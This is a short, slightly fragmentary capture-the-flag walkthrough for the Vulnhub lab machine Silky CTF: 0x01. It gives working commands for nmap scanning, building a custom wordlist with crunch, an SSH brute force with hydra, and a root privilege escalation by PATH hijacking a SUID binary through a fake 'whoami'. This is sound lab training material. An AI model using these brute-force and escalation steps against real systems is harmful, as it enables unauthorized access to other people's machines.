Today, we are going to pwn Silky CTF: 0x01 from Vulnhub.
- Host Discovery
- Nmap Scan of the machine
- Checking for disallowed entry in
- Password recovery
- SSH bruteforce of user silky
- Privilege Escalation
nmap -sn 192.168.43.0/24 will quickly gives the list of alive host from where we can see our silky machine ip.
Starting with nmap, we do
nmap -sV -sC -A 192.168.43.232. Although this command is very useful as it provides us a good amount of information on our host.
So, from above nmap result we can see there’s a note.txt is on the server. Accessing that webpage gives german text which translates to:
I absolutely have to remove the password from the page, after all, the last 2 characters are missing. But still.
So, one of the useful tool here is
crunch available on kali linux, so I used it to make a password file.
crunch 7 7 s1lKy^% > pass.txt
7 7 - Since we know that password is 7 character long we use it define that we need minimum of 7 and maximum of 7 characters/
^% - This is used to specified that last 2nd character is a symbol and last one is a digit.
So, whenever it comes to bruteforce hydra to the rescue.
hydra -l silky -P pass.txt 192.168.43.232 ssh
So, trying our
find / -perm -u=s -type f 2>/dev/null gives a interesting binary executable file named
strings /usr/bin/sky reveals some information on how the binary works.
So, as we know it is using
whoami so I did the following:
cd /tmp echo "/bin/sh" > whoami chmod 777 whoami sky
Kaboom, we’re root now.
This was an easy Vulnhub machine and a great way to learn about generating custom passwords using